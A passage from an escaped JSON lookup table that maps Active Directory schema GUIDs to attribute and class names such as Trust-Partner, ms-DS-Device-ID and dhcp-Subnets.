\"Original-Display-Table-MSDOS\",\n \"bf967a5c-0de6-11d0-a285-00aa003049e2\": \"Trust-Direction\",\n \"0a63e12c-3040-4441-ae26-cd95af0d247e\": \"ms-DS-cloudExtensionAttribute9\",\n \"bf967946-0de6-11d0-a285-00aa003049e2\": \"Creation-Time\",\n \"11b6cc7c-48c4-11d1-a9c3-0000f80367c1\": \"meetingID\",\n \"8398948b-7457-4d91-bd4d-8d7ed669c9f7\": \"ms-net-ieee-8023-GP-PolicyData\",\n \"bf9679f1-0de6-11d0-a285-00aa003049e2\": \"Other-Login-Workstations\",\n \"b000ea7a-a086-11d0-afdd-00c04fd930c9\": \"Trust-Parent\",\n \"670afcb3-13bd-47fc-90b3-0a527ed81ab7\": \"ms-DS-cloudExtensionAttribute10\",\n \"4229c897-c211-437c-a5ae-dbf705b696e5\": \"ms-DFSR-Member\",\n \"36093235-c715-4821-ab6a-b56fb2805a58\": \"ms-DS-Claim-Types\",\n \"4d8601ed-ac85-11d0-afe3-00c04fd930c9\": \"Creation-Wizard\",\n \"11b6cc89-48c4-11d1-a9c3-0000f80367c1\": \"meetingIP\",\n \"d3c527c7-2606-4deb-8cfd-18426feec8ce\": \"ms-net-ieee-8023-GP-PolicyReserved\",\n \"0296c123-40da-11d1-a9c0-0000f80367c1\": \"Other-Mailbox\",\n \"bf967a5d-0de6-11d0-a285-00aa003049e2\": \"Trust-Partner\",\n \"9e9ebbc8-7da5-42a6-8925-244e12a56e24\": \"ms-DS-cloudExtensionAttribute11\",\n \"7bfdcb85-4807-11d1-a9c3-0000f80367c1\": \"Creator\",\n \"11b6cc8e-48c4-11d1-a9c3-0000f80367c1\": \"meetingIsEncrypted\",\n \"3164c36a-ba26-468c-8bda-c1e5cc256728\": \"ms-PKI-Cert-Template-OID\",\n \"bf9679f2-0de6-11d0-a285-00aa003049e2\": \"Other-Name\",\n \"bf967a5e-0de6-11d0-a285-00aa003049e2\": \"Trust-Posix-Offset\",\n \"3c01c43d-e10b-4fca-92b2-4cf615d5b09a\": \"ms-DS-cloudExtensionAttribute12\",\n \"e58f972e-64b5-46ef-8d8b-bbc3e1897eab\": \"ms-DFSR-Connection\",\n \"7a4a4584-b350-478f-acd6-b4b852d82cc0\": \"ms-DS-Resource-Properties\",\n \"963d2737-48be-11d1-a9c3-0000f80367c1\": \"CRL-Object\",\n \"11b6cc7f-48c4-11d1-a9c3-0000f80367c1\": \"meetingKeyword\",\n \"dbd90548-aa37-4202-9966-8c537ba5ce32\": \"ms-PKI-Certificate-Application-Policy\",\n \"1ea64e5d-ac0f-11d2-90df-00c04fd91ab1\": \"Other-Well-Known-Objects\",\n \"bf967a60-0de6-11d0-a285-00aa003049e2\": \"Trust-Type\",\n \"28be464b-ab90-4b79-a6b0-df437431d036\": \"ms-DS-cloudExtensionAttribute13\",\n \"963d2731-48be-11d1-a9c3-0000f80367c1\": \"CRL-Partitioned-Revocation-List\",\n \"11b6cc84-48c4-11d1-a9c3-0000f80367c1\": \"meetingLanguage\",\n \"ea1dddc4-60ff-416e-8cc0-17cee534bce7\": \"ms-PKI-Certificate-Name-Flag\",\n \"bf9679f3-0de6-11d0-a285-00aa003049e2\": \"Owner\",\n \"bf967a61-0de6-11d0-a285-00aa003049e2\": \"UAS-Compat\",\n \"cebcb6ba-6e80-4927-8560-98feca086a9f\": \"ms-DS-cloudExtensionAttribute14\",\n \"7b9a2d92-b7eb-4382-9772-c3e0f9baaf94\": \"ms-ieee-80211-Policy\",\n \"81a3857c-5469-4d8f-aae6-c27699762604\": \"ms-DS-Claim-Type\",\n \"167757b2-47f3-11d1-a9c3-0000f80367c1\": \"Cross-Certificate-Pair\",\n \"11b6cc80-48c4-11d1-a9c3-0000f80367c1\": \"meetingLocation\",\n \"38942346-cc5b-424b-a7d8-6ffd12029c5f\": \"ms-PKI-Certificate-Policy\",\n \"7d6c0e99-7e20-11d0-afd6-00c04fd930c9\": \"Package-Flags\",\n \"0bb0fca0-1e89-429f-901a-1413894d9f59\": \"uid\",\n \"aae4d537-8af0-4daa-9cc6-62eadb84ff03\": \"ms-DS-cloudExtensionAttribute15\",\n \"1f0075fe-7e40-11d0-afd6-00c04fd930c9\": \"Curr-Machine-Id\",\n \"11b6cc85-48c4-11d1-a9c3-0000f80367c1\": \"meetingMaxParticipants\",\n \"b7ff5a38-0818-42b0-8110-d3d154c97f24\": \"ms-PKI-Credential-Roaming-Tokens\",\n \"7d6c0e98-7e20-11d0-afd6-00c04fd930c9\": \"Package-Name\",\n \"bf967a64-0de6-11d0-a285-00aa003049e2\": \"UNC-Name\",\n \"9581215b-5196-4053-a11e-6ffcafc62c4d\": \"ms-DS-cloudExtensionAttribute16\",\n \"a0ed2ac1-970c-4777-848e-ec63a0ec44fc\": \"ms-Imaging-PSPs\",\n \"5b283d5e-8404-4195-9339-8450188c501a\": \"ms-DS-Resource-Property\",\n \"1f0075fc-7e40-11d0-afd6-00c04fd930c9\": \"Current-Location\",\n \"11b6cc7d-48c4-11d1-a9c3-0000f80367c1\": \"meetingName\",\n \"d15ef7d8-f226-46db-ae79-b34e560bd12c\": \"ms-PKI-Enrollment-Flag\",\n \"7d6c0e96-7e20-11d0-afd6-00c04fd930c9\": \"Package-Type\",\n \"bf9679e1-0de6-11d0-a285-00aa003049e2\": \"Unicode-Pwd\",\n \"3d3c6dda-6be8-4229-967e-2ff5bb93b4ce\": \"ms-DS-cloudExtensionAttribute17\",\n \"963d273f-48be-11d1-a9c3-0000f80367c1\": \"Current-Parent-CA\",\n \"11b6cc86-48c4-11d1-a9c3-0000f80367c1\": \"meetingOriginator\",\n \"f22bd38f-a1d0-4832-8b28-0331438886a6\": \"ms-PKI-Enrollment-Servers\",\n \"5245801b-ca6a-11d0-afff-0000f80367c1\": \"Parent-CA\",\n \"ba0184c7-38c5-4bed-a526-75421470580c\": \"uniqueIdentifier\",\n \"88e73b34-0aa6-4469-9842-6eb01b32a5b5\": \"ms-DS-cloudExtensionAttribute18\",\n \"1f7c257c-b8a3-4525-82f8-11ccc7bee36e\": \"ms-Imaging-PostScanProcess\",\n \"72e3d47a-b342-4d45-8f56-baff803cabf9\": \"ms-DS-Resource-Property-List\",\n \"bf967947-0de6-11d0-a285-00aa003049e2\": \"Current-Value\",\n \"11b6cc88-48c4-11d1-a9c3-0000f80367c1\": \"meetingOwner\",\n \"e96a63f5-417f-46d3-be52-db7703c503df\": \"ms-PKI-Minimal-Key-Size\",\n \"963d2733-48be-11d1-a9c3-0000f80367c1\": \"Parent-CA-Certificate-Chain\",\n \"8f888726-f80a-44d7-b1ee-cb9df21392c8\": \"uniqueMember\",\n \"0975fe99-9607-468a-8e18-c800d3387395\": \"ms-DS-cloudExtensionAttribute19\",\n \"bf96799c-0de6-11d0-a285-00aa003049e2\": \"DBCS-Pwd\",\n \"11b6cc81-48c4-11d1-a9c3-0000f80367c1\": \"meetingProtocol\",\n \"8c9e1288-5028-4f4f-a704-76d026f246ef\": \"ms-PKI-OID-Attribute\",\n \"2df90d74-009f-11d2-aa4c-00c04fd7d83a\": \"Parent-GUID\",\n \"50950839-cc4c-4491-863a-fcf942d684b7\": \"unstructuredAddress\",\n \"f5446328-8b6e-498d-95a8-211748d5acdc\": \"ms-DS-cloudExtensionAttribute20\",\n \"a16f33c7-7fd6-4828-9364-435138fda08d\": \"ms-Print-ConnectionPolicy\",\n \"b72f862b-bb25-4d5d-aa51-62c59bdf90ae\": \"ms-SPP-Activation-Objects-Container\",\n \"bf967948-0de6-11d0-a285-00aa003049e2\": \"Default-Class-Store\",\n \"11b6cc8d-48c4-11d1-a9c3-0000f80367c1\": \"meetingRating\",\n \"5f49940e-a79f-4a51-bb6f-3d446a54dc6b\": \"ms-PKI-OID-CPS\",\n \"28630ec0-41d5-11d1-a9c1-0000f80367c1\": \"Partial-Attribute-Deletion-List\",\n \"9c8ef177-41cf-45c9-9673-7716c0c8901b\": \"unstructuredName\",\n \"6b3d6fda-0893-43c4-89fb-1fb52a6616a9\": \"ms-DS-Issuer-Certificates\",\n \"720bc4e2-a54a-11d0-afdf-00c04fd930c9\": \"Default-Group\",\n \"11b6cc8f-48c4-11d1-a9c3-0000f80367c1\": \"meetingRecurrence\",\n \"7d59a816-bb05-4a72-971f-5c1331f67559\": \"ms-PKI-OID-LocalizedName\",\n \"19405b9e-3cfa-11d1-a9c0-0000f80367c1\": \"Partial-Attribute-Set\",\n \"d9e18312-8939-11d1-aebc-0000f80367c1\": \"Upgrade-Product-Code\",\n \"ca3286c2-1f64-4079-96bc-e62b610e730f\": \"ms-DS-Registration-Quota\",\n \"37cfd85c-6719-4ad8-8f9e-8678ba627563\": \"ms-PKI-Enterprise-Oid\",\n \"51a0e68c-0dc5-43ca-935d-c1c911bf2ee5\": \"ms-SPP-Activation-Object\",\n \"b7b13116-b82e-11d0-afee-0000f80367c1\": \"Default-Hiding-Value\",\n \"11b6cc8a-48c4-11d1-a9c3-0000f80367c1\": \"meetingScope\",\n \"04c4da7a-e114-4e69-88de-e293f2d3b395\": \"ms-PKI-OID-User-Notice\",\n \"07383084-91df-11d1-aebc-0000f80367c1\": \"Pek-Key-Change-Interval\",\n \"032160bf-9824-11d1-aec0-0000f80367c1\": \"UPN-Suffixes\",\n \"0a5caa39-05e6-49ca-b808-025b936610e7\": \"ms-DS-Maximum-Registration-Inactivity-Period\",\n \"bf96799f-0de6-11d0-a285-00aa003049e2\": \"Default-Local-Policy-Object\",\n \"11b6cc90-48c4-11d1-a9c3-0000f80367c1\": \"meetingStartTime\",\n \"bab04ac2-0435-4709-9307-28380e7c7001\": \"ms-PKI-Private-Key-Flag\",\n \"07383083-91df-11d1-aebc-0000f80367c1\": \"Pek-List\",\n \"bf967a68-0de6-11d0-a285-00aa003049e2\": \"User-Account-Control\",\n \"e3fb56c8-5de8-45f5-b1b1-d2b6cd31e762\": \"ms-DS-Device-Location\",\n \"26ccf238-a08e-4b86-9a82-a8c9ac7ee5cb\": \"ms-PKI-Key-Recovery-Agent\",\n \"e027a8bd-6456-45de-90a3-38593877ee74\": \"ms-TPM-Information-Objects-Container\",\n \"26d97367-6070-11d1-a9c6-0000f80367c1\": \"Default-Object-Category\",\n \"11b6cc82-48c4-11d1-a9c3-0000f80367c1\": \"meetingType\",\n \"0cd8711f-0afc-4926-a4b1-09b08d3d436c\": \"ms-PKI-Site-Name\",\n \"963d273c-48be-11d1-a9c3-0000f80367c1\": \"Pending-CA-Certificates\",\n \"bf967a69-0de6-11d0-a285-00aa003049e2\": \"User-Cert\",\n \"617626e9-01eb-42cf-991f-ce617982237e\": \"ms-DS-Registered-Owner\",\n \"281416c8-1968-11d0-a28f-00aa003049e2\": \"Default-Priority\",\n \"11b6cc8c-48c4-11d1-a9c3-0000f80367c1\": \"meetingURL\",\n \"9de8ae7d-7a5b-421d-b5e4-061f79dfd5d7\": \"ms-PKI-Supersede-Templates\",\n \"963d273e-48be-11d1-a9c3-0000f80367c1\": \"Pending-Parent-CA\",\n \"bf967a6a-0de6-11d0-a285-00aa003049e2\": \"User-Comment\",\n \"0449160c-5a8e-4fc8-b052-01c0f6e48f02\": \"ms-DS-Registered-Users\",\n \"05f6c878-ccef-11d2-9993-0000f87a57d4\": \"MS-SQL-SQLServer\",\n \"85045b6a-47a6-4243-a7cc-6890701f662c\": \"ms-TPM-Information-Object\",\n \"807a6d30-1669-11d0-a064-00aa006c33ed\": \"Default-Security-Descriptor\",\n \"bf9679c0-0de6-11d0-a285-00aa003049e2\": \"Member\",\n \"13f5236c-1884-46b1-b5d0-484e38990d58\": \"ms-PKI-Template-Minor-Revision\",\n \"5fd424d3-1262-11d0-a060-00aa006c33ed\": \"Per-Msg-Dialog-Display-Table\",\n \"bf967a6d-0de6-11d0-a285-00aa003049e2\": \"User-Parameters\",\n \"a34f983b-84c6-4f0c-9050-a3a14a1d35a4\": \"ms-DS-Approximate-Last-Logon-Time-Stamp\",\n \"167757b5-47f3-11d1-a9c3-0000f80367c1\": \"Delta-Revocation-List\",\n \"0296c122-40da-11d1-a9c0-0000f80367c1\": \"MHS-OR-Address\",\n \"0c15e9f5-491d-4594-918f-32813a091da9\": \"ms-PKI-Template-Schema-Version\",\n \"5fd424d4-1262-11d0-a060-00aa006c33ed\": \"Per-Recip-Dialog-Display-Table\",\n \"bf967a6e-0de6-11d0-a285-00aa003049e2\": \"User-Password\",\n \"22a95c0e-1f83-4c82-94ce-bea688cfc871\": \"ms-DS-Is-Enabled\",\n \"0c7e18ea-ccef-11d2-9993-0000f87a57d4\": \"MS-SQL-OLAPServer\",\n \"ef2fc3ed-6e18-415b-99e4-3114a8cb124b\": \"ms-DNS-Server-Settings\",\n \"bf96794f-0de6-11d0-a285-00aa003049e2\": \"Department\",\n \"bf9679c2-0de6-11d0-a285-00aa003049e2\": \"Min-Pwd-Age\",\n \"3c91fbbf-4773-4ccd-a87b-85d53e7bcf6a\": \"ms-PKI-RA-Application-Policies\",\n \"16775858-47f3-11d1-a9c3-0000f80367c1\": \"Personal-Title\",\n \"11732a8a-e14d-4cc5-b92f-d93f51c6d8e4\": \"userClass\",\n \"100e454d-f3bb-4dcb-845f-8d5edc471c59\": \"ms-DS-Device-OS-Type\",\n \"be9ef6ee-cbc7-4f22-b27b-96967e7ee585\": \"departmentNumber\",\n \"bf9679c3-0de6-11d0-a285-00aa003049e2\": \"Min-Pwd-Length\",\n \"d546ae22-0951-4d47-817e-1c9f96faad46\": \"ms-PKI-RA-Policies\",\n \"0296c11d-40da-11d1-a9c0-0000f80367c1\": \"Phone-Fax-Other\",\n \"23998ab5-70f8-4007-a4c1-a84a38311f9a\": \"userPKCS12\",\n \"70fb8c63-5fab-4504-ab9d-14b329a8a7f8\": \"ms-DS-Device-OS-Version\",\n \"11d43c5c-ccef-11d2-9993-0000f87a57d4\": \"MS-SQL-SQLRepository\",\n \"555c21c3-a136-455a-9397-796bbd358e25\": \"ms-Authz-Central-Access-Policies\",\n \"bf967950-0de6-11d0-a285-00aa003049e2\": \"Description\",\n \"bf9679c4-0de6-11d0-a285-00aa003049e2\": \"Min-Ticket-Age\",\n \"fe17e04b-937d-4f7e-8e0e-9292c8d5683e\": \"ms-PKI-RA-Signature\",\n \"f0f8ffa2-1191-11d0-a060-00aa006c33ed\": \"Phone-Home-Other\",\n \"28630ebb-41d5-11d1-a9c1-0000f80367c1\": \"User-Principal-Name\",\n \"90615414-a2a0-4447-a993-53409599b74e\": \"ms-DS-Device-Physical-IDs\",\n \"eea65906-8ac6-11d0-afda-00c04fd930c9\": \"Desktop-Profile\",\n \"bf9679c5-0de6-11d0-a285-00aa003049e2\": \"Modified-Count\",\n \"6617e4ac-a2f1-43ab-b60c-11fbd1facf05\": \"ms-PKI-RoamingTimeStamp\",\n \"f0f8ffa1-1191-11d0-a060-00aa006c33ed\": \"Phone-Home-Primary\",\n \"9a9a021f-4a5b-11d1-a9c3-0000f80367c1\": \"User-Shared-Folder\",\n \"c30181c7-6342-41fb-b279-f7c566cbe0a7\": \"ms-DS-Device-ID\",\n \"17c2f64e-ccef-11d2-9993-0000f87a57d4\": \"MS-SQL-SQLPublication\",\n \"99bb1b7a-606d-4f8b-800e-e15be554ca8d\": \"ms-Authz-Central-Access-Rules\",\n \"974c9a02-33fc-11d3-aa6e-00c04f8eedd8\": \"msExch-Proxy-Gen-Options\",\n \"bf967951-0de6-11d0-a285-00aa003049e2\": \"Destination-Indicator\",\n \"bf9679c6-0de6-11d0-a285-00aa003049e2\": \"Modified-Count-At-Last-Prom\",\n \"b3f93023-9239-4f7c-b99c-6745d87adbc2\": \"ms-PKI-DPAPIMasterKeys\",\n \"4d146e4b-48d4-11d1-a9c3-0000f80367c1\": \"Phone-Ip-Other\",\n \"9a9a0220-4a5b-11d1-a9c3-0000f80367c1\": \"User-Shared-Folder-Other\",\n \"ef65695a-f179-4e6a-93de-b01e06681cfb\": \"ms-DS-Device-Object-Version\",\n \"963d2750-48be-11d1-a9c3-0000f80367c1\": \"dhcp-Classes\",\n \"9a7ad94a-ca53-11d1-bbd0-0080c76670c0\": \"Modify-Time-Stamp\",\n \"b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7\": \"ms-PKI-AccountCredentials\",\n \"4d146e4a-48d4-11d1-a9c3-0000f80367c1\": \"Phone-Ip-Primary\",\n \"e16a9db2-403c-11d1-a9c0-0000f80367c1\": \"User-SMIME-Certificate\",\n \"862166b6-c941-4727-9565-48bfff2941de\": \"ms-DS-Is-Member-Of-DL-Transitive\",\n \"1d08694a-ccef-11d2-9993-0000f87a57d4\": \"MS-SQL-SQLDatabase\",\n \"5b4a06dc-251c-4edb-8813-0bdd71327226\": \"ms-Authz-Central-Access-Rule\",\n \"963d2741-48be-11d1-a9c3-0000f80367c1\": \"dhcp-Flags\",\n \"bf9679c7-0de6-11d0-a285-00aa003049e2\": \"Moniker\",\n \"f39b98ad-938d-11d1-aebd-0000f80367c1\": \"ms-RRAS-Attribute\",\n \"0296c11f-40da-11d1-a9c0-0000f80367c1\": \"Phone-ISDN-Primary\",\n \"bf9679d7-0de6-11d0-a285-00aa003049e2\": \"User-Workstations\",\n \"e215395b-9104-44d9-b894-399ec9e21dfc\": \"ms-DS-Member-Transitive\",\n \"963d2742-48be-11d1-a9c3-0000f80367c1\": \"dhcp-Identification\",\n \"bf9679c8-0de6-11d0-a285-00aa003049e2\": \"Moniker-Display-Name\",\n \"f39b98ac-938d-11d1-aebd-0000f80367c1\": \"ms-RRAS-Vendor-Attribute-Entry\",\n \"0296c11e-40da-11d1-a9c0-0000f80367c1\": \"Phone-Mobile-Other\",\n \"bf967a6f-0de6-11d0-a285-00aa003049e2\": \"USN-Changed\",\n \"b918fe7d-971a-f404-9e21-9261abec970b\": \"ms-DS-Parent-Dist-Name\",\n \"20af031a-ccef-11d2-9993-0000f87a57d4\": \"MS-SQL-OLAPDatabase\",\n \"a5679cb0-6f9d-432c-8b75-1e3e834f02aa\": \"ms-Authz-Central-Access-Policy\",\n \"963d2747-48be-11d1-a9c3-0000f80367c1\": \"dhcp-Mask\",\n \"1f2ac2c8-3b71-11d2-90cc-00c04fd91ab1\": \"Move-Tree-State\",\n \"a6f24a23-d65c-4d65-a64f-35fb6873c2b9\": \"ms-RADIUS-FramedInterfaceId\",\n \"f0f8ffa3-1191-11d0-a060-00aa006c33ed\": \"Phone-Mobile-Primary\",\n \"bf967a70-0de6-11d0-a285-00aa003049e2\": \"USN-Created\",\n \"1e02d2ef-44ad-46b2-a67d-9fd18d780bca\": \"ms-DS-Repl-Value-Meta-Data-Ext\",\n \"963d2754-48be-11d1-a9c3-0000f80367c1\": \"dhcp-MaxKey\",\n \"998b10f7-aa1a-4364-b867-753d197fe670\": \"ms-COM-DefaultPartitionLink\",\n \"a4da7289-92a3-42e5-b6b6-dad16d280ac9\": \"ms-RADIUS-SavedFramedInterfaceId\",\n \"f0f8ffa5-1191-11d0-a060-00aa006c33ed\": \"Phone-Office-Other\",\n \"bf967a71-0de6-11d0-a285-00aa003049e2\": \"USN-DSA-Last-Obj-Removed\",\n \"6055f766-202e-49cd-a8be-e52bb159edfb\": \"ms-DS-Drs-Farm-ID\",\n \"09f0506a-cd28-11d2-9993-0000f87a57d4\": \"MS-SQL-OLAPCube\",\n \"5ef243a8-2a25-45a6-8b73-08a71ae677ce\": \"ms-Kds-Prov-ServerConfiguration\",\n \"963d2744-48be-11d1-a9c3-0000f80367c1\": \"dhcp-Obj-Description\",\n \"430f678b-889f-41f2-9843-203b5a65572f\": \"ms-COM-ObjectId\",\n \"f63ed610-d67c-494d-87be-cd1e24359a38\": \"ms-RADIUS-FramedIpv6Prefix\",\n \"f0f8ffa4-1191-11d0-a060-00aa006c33ed\": \"Phone-Pager-Other\",\n \"a8df7498-c5ea-11d1-bbcb-0080c76670c0\": \"USN-Intersite\",\n \"b5f1edfe-b4d2-4076-ab0f-6148342b0bf6\": \"ms-DS-Issuer-Public-Certificates\",\n \"963d2743-48be-11d1-a9c3-0000f80367c1\": \"dhcp-Obj-Name\",\n \"09abac62-043f-4702-ac2b-6ca15eee5754\": \"ms-COM-PartitionLink\",\n \"0965a062-b1e1-403b-b48d-5c0eb0e952cc\": \"ms-RADIUS-SavedFramedIpv6Prefix\",\n \"f0f8ffa6-1191-11d0-a060-00aa006c33ed\": \"Phone-Pager-Primary\",\n \"bf967a73-0de6-11d0-a285-00aa003049e2\": \"USN-Last-Obj-Rem\",\n \"60686ace-6c27-43de-a4e5-f00c2f8d3309\": \"ms-DS-IsManaged\",\n \"ca7b9735-4b2a-4e49-89c3-99025334dc94\": \"ms-TAPI-Rt-Conference\",\n \"aa02fd41-17e0-4f18-8687-b2239649736b\": \"ms-Kds-Prov-RootKey\",\n \"963d274f-48be-11d1-a9c3-0000f80367c1\": \"dhcp-Options\",\n \"67f121dc-7d02-4c7d-82f5-9ad4c950ac34\": \"ms-COM-PartitionSetLink\",\n \"5a5aa804-3083-4863-94e5-018a79a22ec0\": \"ms-RADIUS-FramedIpv6Route\",\n \"9c979768-ba1a-4c08-9632-c6a5c1ed649a\": \"photo\",\n \"167758ad-47f3-11d1-a9c3-0000f80367c1\": \"USN-Source\",\n \"5315ba8e-958f-4b52-bd38-1349a304dd63\": \"ms-DS-Cloud-IsManaged\",\n \"963d2753-48be-11d1-a9c3-0000f80367c1\": \"dhcp-Properties\",\n \"9e6f3a4d-242c-4f37-b068-36b57f9fc852\": \"ms-COM-UserLink\",\n \"9666bb5c-df9d-4d41-b437-2eec7e27c9b3\": \"ms-RADIUS-SavedFramedIpv6Route\",\n \"bf9679f7-0de6-11d0-a285-00aa003049e2\": \"Physical-Delivery-Office-Name\",\n \"4d2fa380-7f54-11d2-992a-0000f87a57d4\": \"Valid-Accesses\",\n \"78565e80-03d4-4fe3-afac-8c3bca2f3653\": \"ms-DS-Cloud-Anchor\",\n \"53ea1cb5-b704-4df9-818f-5cb4ec86cac1\": \"ms-TAPI-Rt-Person\",\n \"7b8b558a-93a5-4af7-adca-c017e67f1057\": \"ms-DS-Group-Managed-Service-Account\",\n \"963d2748-48be-11d1-a9c3-0000f80367c1\": \"dhcp-Ranges\",\n \"8e940c8a-e477-4367-b08d-ff2ff942dcd7\": \"ms-COM-UserPartitionSetLink\",\n \"3532dfd8-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-Name\",\n \"b7b13119-b82e-11d0-afee-0000f80367c1\": \"Physical-Location-Object\",\n \"281416df-1968-11d0-a28f-00aa003049e2\": \"Vendor\",\n \"a1e8b54f-4bd6-4fd2-98e2-bcee92a55497\": \"ms-DS-Cloud-Issuer-Public-Certificates\",\n \"963d274a-48be-11d1-a9c3-0000f80367c1\": \"dhcp-Reservations\",\n \"e85e1204-3434-41ad-9b56-e2901228fff0\": \"MS-DRM-Identity-Certificate\",\n \"48fd44ea-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-RegisteredOwner\",\n \"8d3bca50-1d7e-11d0-a081-00aa006c33ed\": \"Picture\",\n \"bf967a76-0de6-11d0-a285-00aa003049e2\": \"Version-Number\",\n \"89848328-7c4e-4f6f-a013-28ce3ad282dc\": \"ms-DS-Cloud-IsEnabled\",\n \"50ca5d7d-5c8b-4ef3-b9df-5b66d491e526\": \"ms-WMI-IntRangeParam\",\n \"e3c27fdf-b01d-4f4e-87e7-056eef0eb922\": \"ms-DS-Value-Type\",\n \"963d2745-48be-11d1-a9c3-0000f80367c1\": \"dhcp-Servers\",\n \"80863791-dbe9-4eb8-837e-7f0ab55d9ac7\": \"ms-DS-Additional-Dns-Host-Name\",\n \"4f6cbdd8-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-Contact\",\n \"fc5a9106-3b9d-11d2-90cc-00c04fd91ab1\": \"PKI-Critical-Extensions\",\n \"7d6c0e9a-7e20-11d0-afd6-00c04fd930c9\": \"Version-Number-Hi\",\n \"b7acc3d2-2a74-4fa4-ac25-e63fe8b61218\": \"ms-DS-SyncServerUrl\",\n \"963d2749-48be-11d1-a9c3-0000f80367c1\": \"dhcp-Sites\",\n \"975571df-a4d5-429a-9f59-cdc6581d91e6\": \"ms-DS-Additional-Sam-Account-Name\",\n \"561c9644-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-Location\",\n \"1ef6336e-3b9e-11d2-90cc-00c04fd91ab1\": \"PKI-Default-CSPs\",\n \"7d6c0e9b-7e20-11d0-afd6-00c04fd930c9\": \"Version-Number-Lo\",\n \"de0caa7f-724e-4286-b179-192671efc664\": \"ms-DS-User-Allowed-To-Authenticate-To\",\n \"292f0d9a-cf76-42b0-841f-b650f331df62\": \"ms-WMI-IntSetParam\",\n \"2eeb62b3-1373-fe45-8101-387f1676edc7\": \"ms-DS-Claims-Transformation-Policy-Type\",\n \"963d2752-48be-11d1-a9c3-0000f80367c1\": \"dhcp-State\",\n \"d3aa4a5c-4e03-4810-97aa-2b339e7a434b\": \"MS-DS-All-Users-Trust-Quota\",\n \"5b5d448c-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-Memory\",\n \"426cae6e-3b9d-11d2-90cc-00c04fd91ab1\": \"PKI-Default-Key-Spec\",\n \"1f0075fd-7e40-11d0-afd6-00c04fd930c9\": \"Vol-Table-GUID\",\n \"2c4c9600-b0e1-447d-8dda-74902257bdb5\": \"ms-DS-User-Allowed-To-Authenticate-From\",\n \"963d2746-48be-11d1-a9c3-0000f80367c1\": \"dhcp-Subnets\",\n \"8469441b-9ac4-4e45-8205-bd219dbf672d\": \"ms-DS-Allowed-DNS-Suffixes\",\n \"603e94c4-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-Build\",\n \"926be278-56f9-11d2-90d0-00c04fd91ab1\": \"PKI-Enrollment-Access\",\n \"1f0075fb-7e40-11d0-afd6-00c04fd930c9\": \"Vol-Table-Idx-GUID\",\n \"8521c983-f599-420f-b9ab-b1222bdf95c1\": \"ms-DS-User-TGT-Lifetime\",\n \"07502414-fdca-4851-b04a-13645b11d226\": \"ms-WMI-MergeablePolicyTemplate\",\n \"c8fca9b1-7d88-bb4f-827a-448927710762\": \"ms-DS-Claims-Transformation-Policies\",\n \"963d273b-48be-11d1-a9c3-0000f80367c1\": \"dhcp-Type\",\n \"800d94d7-b7a1-42a1-b14d-7cae1423d07f\": \"ms-DS-Allowed-To-Delegate-To\",\n \"64933a3e-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-ServiceAccount\",\n \"041570d2-3b9e-11d2-90cc-00c04fd91ab1\": \"PKI-Expiration-Period\",\n \"34aaa217-b699-11d0-afee-0000f80367c1\": \"Volume-Count\",\n \"105babe9-077e-4793-b974-ef0410b62573\": \"ms-DS-Computer-Allowed-To-Authenticate-To\",\n \"963d273a-48be-11d1-a9c3-0000f80367c1\": \"dhcp-Unique-Key\",\n \"c4af1073-ee50-4be0-b8c0-89a41fe99abe\": \"ms-DS-Auxiliary-Classes\",\n \"696177a6-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-CharacterSet\",\n \"18976af6-3b9e-11d2-90cc-00c04fd91ab1\": \"PKI-Extended-Key-Usage\",\n \"244b2970-5abd-11d0-afd2-00c04fd930c9\": \"Wbem-Path\",\n \"2e937524-dfb9-4cac-a436-a5b7da64fd66\": \"ms-DS-Computer-TGT-Lifetime\",\n \"55dd81c9-c312-41f9-a84d-c6adbdf1e8e1\": \"ms-WMI-ObjectEncoding\",\n \"641e87a4-8326-4771-ba2d-c706df35e35a\": \"ms-DS-Cloud-Extensions\",\n \"963d2755-48be-11d1-a9c3-0000f80367c1\": \"dhcp-Update-Time\",\n \"e185d243-f6ce-4adb-b496-b0c005d7823c\": \"ms-DS-Approx-Immed-Subordinates\",\n \"6ddc42c0-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-SortOrder\",\n \"e9b0a87e-3b9d-11d2-90cc-00c04fd91ab1\": \"PKI-Key-Usage\",\n \"05308983-7688-11d1-aded-00c04fd8d5cd\": \"Well-Known-Objects\",\n \"f2973131-9b4d-4820-b4de-0474ef3b849f\": \"ms-DS-Service-Allowed-To-Authenticate-To\",\n \"bf967953-0de6-11d0-a285-00aa003049e2\": \"Display-Name\",\n \"3e1ee99c-6604-4489-89d9-84798a89515a\": \"ms-DS-AuthenticatedAt-DC\",\n \"72dc918a-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-UnicodeSortOrder\",\n \"f0bfdefa-3b9d-11d2-90cc-00c04fd91ab1\": \"PKI-Max-Issuing-Depth\",\n \"bf967a77-0de6-11d0-a285-00aa003049e2\": \"When-Changed\",\n \"97da709a-3716-4966-b1d1-838ba53c3d89\": \"ms-DS-Service-Allowed-To-Authenticate-From\",\n \"e2bc80f1-244a-4d59-acc6-ca5c4f82e6e1\": \"ms-WMI-PolicyTemplate\",\n \"310b55ce-3dcd-4392-a96d-c9e35397c24f\": \"ms-DS-Device-Registration-Service-Container\",\n \"bf967954-0de6-11d0-a285-00aa003049e2\": \"Display-Name-Printable\",\n \"e8b2c971-a6df-47bc-8d6f-62770d527aa5\": \"ms-DS-AuthenticatedTo-Accountlist\",\n \"7778bd90-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-Clustered\",\n \"1219a3ec-3b9e-11d2-90cc-00c04fd91ab1\": \"PKI-Overlap-Period\",\n \"bf967a78-0de6-11d0-a285-00aa003049e2\": \"When-Created\",\n \"5dfe3c20-ca29-407d-9bab-8421e55eb75c\": \"ms-DS-Service-TGT-Lifetime\",\n \"9a7ad946-ca53-11d1-bbd0-0080c76670c0\": \"DIT-Content-Rules\",\n \"503fc3e8-1cc6-461a-99a3-9eee04f402a7\": \"ms-DS-Az-Application-Data\",\n \"7b91c840-ccee-11d2-9993-0000f87a57d4\": \"MS-SQL-NamedPipe\",\n \"8447f9f1-1027-11d0-a05f-00aa006c33ed\": 